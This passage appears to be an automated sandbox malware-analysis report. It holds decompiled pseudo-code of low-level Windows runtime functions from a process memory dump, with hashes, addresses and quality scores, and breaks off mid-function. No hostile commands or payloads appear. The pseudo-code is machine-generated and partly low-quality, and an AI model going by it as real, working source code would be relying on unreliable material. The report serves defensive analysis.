0x037c920c
0x037c91e9
0x037c91e9
0x037c91ee
0x037c91f3
0x037c91f3
0x037c91f3
0x037c91e7
0x00000000
0x00000000
0x00000000
0x037c9134
0x037c9125
0x037c911d
0x037c914e
0x037c90d1
0x037c90d1
0x037c90d3
0x037c90d6
0x037c90d8
0x00000000
0x037c90d8
0x037c90cf

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c438b1eef97584e0f3c1a1edefac7e741abbb650d10ff215facec44575e61f8f
Instruction ID: 425431940dcdc53d9563d25b22af83d3d4b77f31523011932c863f1ad0a8d364
Opcode Fuzzy Hash: c438b1eef97584e0f3c1a1edefac7e741abbb650d10ff215facec44575e61f8f
Instruction Fuzzy Hash: 9B01817251164A8FC355DF14D840B11BBB9EB87721F2940AEE605CF792D774DC81CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 03894015 Relevance: .0, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E03894015(signed int __eax, signed int __ecx) {
				void* __ebx;
				void* __edi;
				signed char _t10;
				signed int _t28;

				_push(__ecx);
				_t28 = __ecx;
				asm("lock xadd [edi+0x24], eax");
				_t10 = (__eax | 0xffffffff) - 1;
				if(_t10 == 0) {
					_t1 = _t28 + 0x1c; // 0x1e
					E037E2280(_t10, _t1);
					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
					E037E2280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x38b86ac);
					E037CF900(0x38b86d4, _t28);
					E037DFFB0(0x38b86ac, _t28, 0x38b86ac);
					 *((intOrPtr*)(_t28 + 0x20)) = 0;
					E037DFFB0(0, _t28, _t1);
					_t18 =  *((intOrPtr*)(_t28 + 0x94));
					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
						L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
					}
					_t10 = L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
				}
				return _t10;
			}

0x0389401a
0x0389401e
0x03894023
0x03894028
0x03894029
0x0389402b
0x0389402f
0x03894043
0x03894046
0x03894051
0x03894057
0x0389405f
0x03894062
0x03894067
0x0389406f
0x0389407c
0x0389407c
0x0389408c
0x0389408c
0x03894097

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1455202b2333b8dc8b430a25c950ad996860b13d6aebeb9fbba34e0845c6dc3b
Instruction ID: 604e57e983fe1369a9be98799c52ecd0c0ce10b9d1999a7e7a6619b3ce011aa5
Opcode Fuzzy Hash: 1455202b2333b8dc8b430a25c950ad996860b13d6aebeb9fbba34e0845c6dc3b
Instruction Fuzzy Hash: 5F01D476201689BFD614EB69CD88E13B7ACEB49650B050269F508CBA11CB24EC11C6E0

Uniqueness

Uniqueness Score: -1.00%

Function 0388138A Relevance: .0, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E0388138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x38bd360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E0380FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1033;
				if(E037E7D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0380B640(E03809AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x0388138a
0x0388138a
0x03881399
0x038813a3
0x038813a8
0x038813aa
0x038813b5
0x038813bb
0x038813c3
0x038813c6
0x038813c9
0x038813d4
0x038813e6
0x038813d6
0x038813df
0x038813df
0x038813f1
0x038813f2
0x038813f4
0x038813f9
0x0388140e

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 904f070814138f907cdd0e7de581eee14dcdd9597e83b458567d8f69a504ce87
Instruction ID: d1e3c3181dc372cb26617579ca16d91204be1b0ed0060c97785f0fc8008509ca
Opcode Fuzzy Hash: 904f070814138f907cdd0e7de581eee14dcdd9597e83b458567d8f69a504ce87
Instruction Fuzzy Hash: CB015275A0035CAFCB14EFA9D845EAEB7B8EF44710F5040A6F904EB281EA74DA01C795

Uniqueness

Uniqueness Score: -1.00%

Function 038814FB Relevance: .0, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E038814FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x38bd360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E0380FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1034;
				if(E037E7D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0380B640(E03809AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x038814fb
0x038814fb
0x0388150a
0x03881514
0x03881519
0x0388151b
0x03881526
0x0388152c
0x03881534
0x03881537
0x0388153a
0x03881545
0x03881557
0x03881547
0x03881550
0x03881550
0x03881562
0x03881563
0x03881565
0x0388156a
0x0388157f

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c9bb0de5ff881dbd9c0622b225b5ee1571cb461218cbe39a8240a79e7f92bb4
Instruction ID: 5a50a97087c3adcd450083092f381910bbd50bad8b6ed757d0d7005222565054
Opcode Fuzzy Hash: 8c9bb0de5ff881dbd9c0622b225b5ee1571cb461218cbe39a8240a79e7f92bb4
Instruction Fuzzy Hash: 78018075A01248ABCB14EFA8D845EAEB7B8EF44710F4040A6F914EB380DA70DA01CB95

Uniqueness

Uniqueness Score: -1.00%

Function 037C58EC Relevance: .0, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E037C58EC(intOrPtr __ecx) {
				signed int _v8;
				char _v28;
				char _v44;
				char _v76;
				void* __edi;
				void* __esi;
				intOrPtr _t10;
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_v8 =  *0x38bd360 ^ _t29;
				_t10 =  *[fs:0x30];
				_t27 = __ecx;
				if(_t10 == 0) {
					L6:
					_t28 = 0x37a5c80;
				} else {
					_t16 =  *((intOrPtr*)(_t10 + 0x10));
					if(_t16 == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
					}
				}
				if(E037C5943() != 0 &&  *0x38b5320 > 5) {
					E03847B5E( &_v44, _t27);
					_t22 =  &_v28;
					E03847B5E( &_v28, _t28);
					_t11 = E03847B9C(0x38b5320, 0x37abf15,  &_v28, _t22, 4,  &_v76);
				}
				return E0380B640(_t11, _t17, _v8 ^ _t29, 0x37abf15, _t27, _t28);
			}

0x037c58fb
0x037c58fe
0x037c5906
0x037c590a
0x037c593c
0x037c593c
0x037c590c
0x037c590c
0x037c5911
0x00000000
0x037c5913
0x037c5913
0x037c5913
0x037c5911
0x037c591d
0x03821035
0x0382103c
0x0382103f
0x03821056
0x03821056
0x037c593b

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7dc6fedc0f710226db43b871414bacd828fea3acebe82d104713c85303238d2c
Instruction ID: b032d47f277bec3ed98e10659b8c6be1195e675b4ea5fd05984c5eb771e0b1ae
Opcode Fuzzy Hash: 7dc6fedc0f710226db43b871414bacd828fea3acebe82d104713c85303238d2c
Instruction Fuzzy Hash: FC01F731A106489BC714EEBADC009AEF7A8EF86230F5900EDA905DB644EF31ED05C751

Uniqueness

Uniqueness Score: -1.00%

Function 0387FEC0 Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E0387FEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x38bd360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E0380FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x266;
				if(E037E7D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0380B640(E03809AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x0387fec0
0x0387fec0
0x0387fecf
0x0387fed9
0x0387fede
0x0387fee0
0x0387feeb
0x0387fef3
0x0387fef6
0x0387fef9
0x0387ff04
0x0387ff16
0x0387ff06
0x0387ff0f
0x0387ff0f
0x0387ff21
0x0387ff22
0x0387ff24
0x0387ff29
0x0387ff3e

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb939183ba057ac6a6c1b771e52bbdd111aac8d5ea74b2478d77798ce957311f
Instruction ID: bdbaff8ce70f1c291b40dc923cada36aa9ec679bd8a8c96330a7272c2373dabe
Opcode Fuzzy Hash: cb939183ba057ac6a6c1b771e52bbdd111aac8d5ea74b2478d77798ce957311f
Instruction Fuzzy Hash: E7018475A0030CABCB14DFA9D845FAEB7B8EF45710F4040A6FA00EB291EA70DA01C795

Uniqueness

Uniqueness Score: -1.00%

Function 0387FE3F Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E0387FE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x38bd360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E0380FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x267;
				if(E037E7D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0380B640(E03809AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x0387fe3f
0x0387fe3f
0x0387fe4e
0x0387fe58
0x0387fe5d
0x0387fe5f
0x0387fe6a
0x0387fe72
0x0387fe75
0x0387fe78
0x0387fe83
0x0387fe95
0x0387fe85
0x0387fe8e
0x0387fe8e
0x0387fea0
0x0387fea1
0x0387fea3
0x0387fea8
0x0387febd

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53f14e0518537f9cc567391be70e7409f9251fc4772c1f0672815e4108bebd84
Instruction ID: 863f47f680c63a552991d14c17d887d7dcc0d0d89d8b3ced9aa4ac1565a50d08
Opcode Fuzzy Hash: 53f14e0518537f9cc567391be70e7409f9251fc4772c1f0672815e4108bebd84
Instruction Fuzzy Hash: DE017175A00348ABCB14DFE9D845EAEB7B8EF44714F0040A6BA00EF291DA70D901C7A5

Uniqueness

Uniqueness Score: -1.00%

Function 037DB02A Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E037DB02A(intOrPtr __ecx, signed short* __edx, short _a4) {
				signed char _t11;
				signed char* _t12;
				intOrPtr _t24;
				signed short* _t25;

				_t25 = __edx;
				_t24 = __ecx;
				_t11 = ( *[fs:0x30])[0x50];
				if(_t11 != 0) {
					if( *_t11 == 0) {
						goto L1;
					}
					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
					L2:
					if( *_t12 != 0) {
						_t12 =  *[fs:0x30];
						if((_t12[0x240] & 0x00000004) == 0) {
							goto L3;
						}
						if(E037E7D50() == 0) {
							_t12 = 0x7ffe0385;
						} else {
							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t12 & 0x00000020) == 0) {
							goto L3;
						}
						return E03847016(_a4, _t24, 0, 0, _t25, 0);
					}
					L3:
					return _t12;
				}
				L1:
				_t12 = 0x7ffe0384;
				goto L2;
			}

0x037db037
0x037db039
0x037db03b
0x037db040
0x0382a60e
0x00000000
0x00000000
0x0382a61d
0x037db04b
0x037db04e
0x0382a627
0x0382a634
0x00000000
0x00000000
0x0382a641
0x0382a653
0x0382a643
0x0382a64c
0x0382a64c
0x0382a65b
0x00000000
0x00000000
0x00000000
0x0382a66c
0x037db057
0x037db057
0x037db057
0x037db046
0x037db046
0x00000000

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
Instruction ID: 8161916914fbb045a03a52663510a2c50cb7e0874c47378e8fefff7166ddafea
Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
Instruction Fuzzy Hash: 1A015E31205688DFD326C75CD988F667BE8EF45A50F0A00E1A915CBA51DB29DC80C621

Uniqueness

Uniqueness Score: -1.00%

Function 03891074 Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E03891074(void* __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
				char _v8;
				void* _v11;
				unsigned int _v12;
				void* _v15;
				void* __esi;
				void* __ebp;
				char* _t16;
				signed int* _t35;

				_t22 = __ebx;
				_t35 = __ecx;
				_v8 = __edx;
				_t13 =  !( *__ecx) + 1;
				_v12 =  !( *__ecx) + 1;
				if(_a4 != 0) {
					E0389165E(__ebx, 0x38b8ae4, (__edx -  *0x38b8b04 >> 0x14) + (__edx -  *0x38b8b04 >> 0x14), __edi, __ecx, (__edx -  *0x38b8b04 >> 0x14) + (__edx -  *0x38b8b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
				}
				E0388AFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
				if(E037E7D50() == 0) {
					_t16 = 0x7ffe0388;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				if( *_t16 != 0) {
					_t16 = E0387FE3F(_t22, _t35, _v8, _v12);
				}
				return _t16;
			}

0x03891074
0x03891080
0x03891082
0x0389108a
0x0389108f
0x03891093
0x038910ab
0x038910ab
0x038910c3
0x038910cf
0x038910e1
0x038910d1
0x038910da
0x038910da
0x038910e9
0x038910f5
0x038910f5
0x038910fe

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ac4411d3151affca7d75f86cc2db3477a43721874cbdfeff9735ff15c755197
Instruction ID: c1d10440cf6ef221739e58513e0da63ac9df096cf4c38bcd7d1e0948cf467e15
Opcode Fuzzy Hash: 9ac4411d3151affca7d75f86cc2db3477a43721874cbdfeff9735ff15c755197
Instruction Fuzzy Hash: 4D014076508746DFDB15EFA9C904B1AB7D9AFC4310F088556F895D7390EE31D440CB92

Uniqueness

Uniqueness Score: -1.00%

Function 03898ED6 Relevance: .0, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E03898ED6(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				short _v62;
				char _v68;
				signed char* _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t42;
				signed int _t43;

				_t40 = __edx;
				_v8 =  *0x38bd360 ^ _t43;
				_v28 = __ecx;
				_v62 = 0x1c2a;
				_v36 =  *((intOrPtr*)(__edx + 0xc8));
				_v32 =  *((intOrPtr*)(__edx + 0xcc));
				_v20 =  *((intOrPtr*)(__edx + 0xd8));
				_v16 =  *((intOrPtr*)(__edx + 0xd4));
				_v24 = __edx;
				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
				if(E037E7D50() == 0) {
					_t29 = 0x7ffe0386;
				} else {
					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v68);
				_push(0x1c);
				_push(0x20402);
				_push( *_t29 & 0x000000ff);
				return E0380B640(E03809AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
			}

0x03898ed6
0x03898ee5
0x03898eed
0x03898ef0
0x03898efa
0x03898f03
0x03898f0c
0x03898f15
0x03898f24
0x03898f27
0x03898f31
0x03898f43
0x03898f33
0x03898f3c
0x03898f3c
0x03898f4e
0x03898f4f
0x03898f51
0x03898f56
0x03898f69

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29fa5a136ae7202e78cb9568448d6ae25bcbd211fb8a87ca172feb24b8810b73
Instruction ID: 2dae24ba3f3117a374c8003d1a9c3d0ea1d9badce2dbc7f02ded6a7a9bdad060
Opcode Fuzzy Hash: 29fa5a136ae7202e78cb9568448d6ae25bcbd211fb8a87ca172feb24b8810b73
Instruction Fuzzy Hash: 81111E74A002499FDB44DFA8D445BAEF7F4FF08300F1442AAE518EB382E7349940CB90

Uniqueness

Uniqueness Score: -1.00%

Function 03898A62 Relevance: .0, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E03898A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0x38bd360 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c20;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(E037E7D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push(0x14);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0380B640(E03809AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x03898a62
0x03898a71
0x03898a79
0x03898a82
0x03898a85
0x03898a89
0x03898a8c
0x03898a8f
0x03898a92
0x03898a95
0x03898a9f
0x03898ab1
0x03898aa1
0x03898aaa
0x03898aaa
0x03898abc
0x03898abd
0x03898abf
0x03898ac4
0x03898ada

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c1b47a059b6796dc74f2590ed242963b4b8a3256005d3d73509d94db256f44e
Instruction ID: b550ead1a84fc7c41ee52e2b5ebf583c24e75806e67a8e78fac5994b37e3e129
Opcode Fuzzy Hash: 4c1b47a059b6796dc74f2590ed242963b4b8a3256005d3d73509d94db256f44e
Instruction Fuzzy Hash: 4A011A75A0021DAFDB04DFA9D9419AEB7B8EF49310F14409AF904FB391E734A900CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 037CDB60 Relevance: .0, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E037CDB60(signed int __ecx) {
				intOrPtr* _t9;
				void* _t12;
				void* _t13;
				intOrPtr _t14;

				_t9 = __ecx;
				_t14 = 0;
				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
					_t13 = 0xc000000d;
				} else {
					_t14 = E037CDB40();
					if(_t14 == 0) {
						_t13 = 0xc0000017;
					} else {
						_t13 = E037CE7B0(__ecx, _t12, _t14, 0xfff);
						if(_t13 < 0) {
							L037CE8B0(__ecx, _t14, 0xfff);
							L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
							_t14 = 0;
						} else {
							_t13 = 0;
							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
						}
					}
				}
				 *_t9 = _t14;
				return _t13;
			}

0x037cdb64
0x037cdb66
0x037cdb6b
0x037cdbaa
0x037cdb71
0x037cdb76
0x037cdb7a
0x037cdba3
0x037cdb7c
0x037cdb87
0x037cdb8b
0x03824fa1
0x03824fb3
0x03824fb8
0x037cdb91
0x037cdb96
0x037cdb98
0x037cdb98
0x037cdb8b
0x037cdb7a
0x037cdb9d
0x037cdba2

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
Instruction ID: 2e16ae253afe28f9012b4c2efd2170ac0ebe2aa34d3cd485639d87c8d9f1d494
Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
Instruction Fuzzy Hash: A0F0FC372216E29BD332DE5548C4F27F6A69FC1B60F19003DF5099F744C9708C029AE4

Uniqueness

Uniqueness Score: -1.00%

Function 037CB1E1 Relevance: .0, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E037CB1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
				signed char* _t13;
				intOrPtr _t22;
				char _t23;

				_t23 = __edx;
				_t22 = __ecx;
				if(E037E7D50() != 0) {
					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t13 = 0x7ffe0384;
				}
				if( *_t13 != 0) {
					_t13 =  *[fs:0x30];
					if((_t13[0x240] & 0x00000004) == 0) {
						goto L3;
					}
					if(E037E7D50() == 0) {
						_t13 = 0x7ffe0385;
					} else {
						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t13 & 0x00000020) == 0) {
						goto L3;
					}
					return E03847016(0x14a4, _t22, _t23, _a4, _a8, 0);
				} else {
					L3:
					return _t13;
				}
			}

0x037cb1e8
0x037cb1ea
0x037cb1f3
0x03824a17
0x037cb1f9
0x037cb1f9
0x037cb1f9
0x037cb201
0x03824a21
0x03824a2e
0x00000000
0x00000000
0x03824a3b
0x03824a4d
0x03824a3d
0x03824a46
0x03824a46
0x03824a55
0x00000000
0x00000000
0x00000000
0x037cb20a
0x037cb20a
0x037cb20a
0x037cb20a

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
Instruction ID: 792ddea7192c221f9f350ffccc9c5348c6eee43def067bce5c4169944b296568
Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
Instruction Fuzzy Hash: C80121322006C4DBC322C39ED809F69BF98EF41350F0D00E9F911CB6B1D638C840C224

Uniqueness

Uniqueness Score: -1.00%

Function 0385FE87 Relevance: .0, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E0385FE87(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v54;
